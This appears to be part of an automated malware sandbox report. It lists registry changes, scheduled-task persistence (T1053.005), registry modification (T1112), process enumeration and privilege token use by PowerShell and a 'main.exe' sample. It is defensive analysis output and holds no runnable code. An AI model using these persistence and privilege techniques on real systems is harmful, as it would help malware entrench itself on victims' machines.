Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={E2BBCF38-C89A-4D17-8DDC-38EDD8C8C05C}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 19 Jun 2024 11:26:29 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1718796387"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdgeCP.exeMicrosoftEdge.exeExplorer.EXEDllHost.exeRuntimeBroker.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CRLs	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\NextPromptBuild = "15063"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 = 56003100000000008458fa61100057696e646f777300400009000400efbe724a6fa88458fa612e000000d8040000000001000000000000000000000000000000437e4a00570069006e0064006f0077007300000016000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\DOMStore	DllHost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 2372b57e3cc2da01	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194\Children\S-1-15-2-36240 = "microsoft.microsoftedge_8wekyb3d8bbwe"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\Certificates	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\NextUpdateDate = "425574335"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Rev = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\cs16.info	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:FMTID = "{30C8EEF4-A832-41E2-AB32-E3C3CA28FD29}"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\Total	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\0\NodeSlot = "1"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	Explorer.EXE
Key deleted	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_ieflipahead	DllHost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByDirection = "1"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\MrtCache	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194\Children\S-1-15-2-36240	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "395205405"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Next Rating Prompt = a0bd3a963fe2da01	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_Emi = "0"	DllHost.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_ieflipahead\Cach = "0"	DllHost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 156d236c3cc2da01	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation	MicrosoftEdge.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

7616 reg.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exe

pid process

1600 schtasks.exe
7984 schtasks.exe
Suspicious behavior: AddClipboardFormatListener 5 IoCs

Processes:

Explorer.EXE

pid process

3376 Explorer.EXE
3376 Explorer.EXE
3376 Explorer.EXE
3376 Explorer.EXE
3376 Explorer.EXE

pid	process
7616	reg.exe

pid	process
1600	schtasks.exe
7984	schtasks.exe

pid	process
3376	Explorer.EXE
3376	Explorer.EXE
3376	Explorer.EXE
3376	Explorer.EXE
3376	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskmgr.exemain.exepowershell.exepowershell.exe

pid	process
2360	powershell.exe
2360	powershell.exe
2912	powershell.exe
2912	powershell.exe
4152	powershell.exe
4152	powershell.exe
2360	powershell.exe
4152	powershell.exe
2912	powershell.exe
2360	powershell.exe
4152	powershell.exe
4152	powershell.exe
2912	powershell.exe
2912	powershell.exe
4984	powershell.exe
4984	powershell.exe
4984	powershell.exe
1092	powershell.exe
1092	powershell.exe
4984	powershell.exe
1092	powershell.exe
1556	powershell.exe
1556	powershell.exe
4944	taskmgr.exe
4944	taskmgr.exe
1092	powershell.exe
1556	powershell.exe
4944	taskmgr.exe
1556	powershell.exe
4944	taskmgr.exe
4944	taskmgr.exe
4192	main.exe
4192	main.exe
4192	main.exe
4192	main.exe
4192	main.exe
4192	main.exe
4192	main.exe
4192	main.exe
4192	main.exe
4192	main.exe
4192	main.exe
4192	main.exe
4192	main.exe
4192	main.exe
5244	powershell.exe
5244	powershell.exe
5244	powershell.exe
4192	main.exe
4192	main.exe
4192	main.exe
4192	main.exe
4192	main.exe
4192	main.exe
4192	main.exe
4192	main.exe
4944	taskmgr.exe
5244	powershell.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
6528	powershell.exe
6528	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 5 IoCs

Processes:

Explorer.EXEtaskmgr.exehl.exeUpdate.exehl.exe

pid process

3376 Explorer.EXE
4944 taskmgr.exe
6900 hl.exe
6800 Update.exe
4128 hl.exe
Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

MicrosoftEdgeCP.exe

pid process

7992 MicrosoftEdgeCP.exe
7992 MicrosoftEdgeCP.exe
7992 MicrosoftEdgeCP.exe
7992 MicrosoftEdgeCP.exe

pid	process
3376	Explorer.EXE
4944	taskmgr.exe
6900	hl.exe
6800	Update.exe
4128	hl.exe

pid	process
7992	MicrosoftEdgeCP.exe
7992	MicrosoftEdgeCP.exe
7992	MicrosoftEdgeCP.exe
7992	MicrosoftEdgeCP.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs

Processes:

chrome.exe

pid	process
6676	chrome.exe
6676	chrome.exe
6676	chrome.exe
6676	chrome.exe
6676	chrome.exe
6676	chrome.exe
6676	chrome.exe
6676	chrome.exe
6676	chrome.exe
6676	chrome.exe
6676	chrome.exe
6676	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exetasklist.exeWMIC.exetasklist.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2360	powershell.exe
Token: SeDebugPrivilege	2912	powershell.exe
Token: SeDebugPrivilege	4152	powershell.exe
Token: SeDebugPrivilege	392	tasklist.exe
Token: SeIncreaseQuotaPrivilege	312	WMIC.exe
Token: SeSecurityPrivilege	312	WMIC.exe
Token: SeTakeOwnershipPrivilege	312	WMIC.exe
Token: SeLoadDriverPrivilege	312	WMIC.exe
Token: SeSystemProfilePrivilege	312	WMIC.exe
